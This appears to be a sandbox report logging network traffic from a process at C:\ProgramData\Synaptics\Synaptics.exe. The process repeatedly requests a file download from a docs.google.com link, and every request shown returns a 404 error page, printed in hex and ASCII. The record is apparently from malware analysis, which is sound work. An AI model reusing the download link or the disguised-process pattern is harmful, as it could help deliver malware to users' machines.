                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kpgHM7Vxw7H7Elfvq/tpiA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:38 UTC204INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:38 UTC204INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        67192.168.2.349819142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:37 UTC201OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:38 UTC204INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:38 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-KEvO0sDQtPujguOcDt7xRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:38 UTC206INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:38 UTC206INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 69 6a 36 59 4d 65 37 5a 55 47 44 57 79 71 6b 44 5a 73 55 7a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cij6YMe7ZUGDWyqkDZsUzg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:38 UTC207INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:38 UTC207INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        68192.168.2.349820142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:38 UTC204OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:38 UTC207INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:38 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-pYIKedYtfW5XgaOa3o760w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:38 UTC209INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 58 43 56 4e 73 33 58 36 7a 53 4e 59 55 59 47 41 47 54 61 47 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YXCVNs3X6zSNYUYGAGTaGg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:38 UTC210INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:38 UTC210INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        69192.168.2.349821142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:38 UTC207OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:38 UTC211INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:38 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-LhV82v7KtqAWQlrEO0I0Sg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:38 UTC212INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:38 UTC212INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 55 6c 2f 4c 6e 44 33 75 51 76 64 4b 43 2b 38 6c 4f 2f 49 66 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5Ul/LnD3uQvdKC+8lO/IfQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:38 UTC213INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:38 UTC213INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        7192.168.2.349742142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:29 UTC18OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:30 UTC21INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:30 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-0J28G3A9p5uIE6qNaKXkRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:30 UTC23INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 49 59 42 6d 71 50 45 7a 74 42 4c 55 71 48 78 4b 66 2f 4f 48 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NIYBmqPEztBLUqHxKf/OHg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:30 UTC24INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:30 UTC24INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        70192.168.2.349822142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:38 UTC210OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:38 UTC214INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:38 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-M5YBli995wMwLbL62tFTaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:38 UTC215INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:38 UTC215INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 55 77 72 66 70 52 4c 73 50 57 64 37 42 43 47 6e 51 75 46 4b 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1UwrfpRLsPWd7BCGnQuFKg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
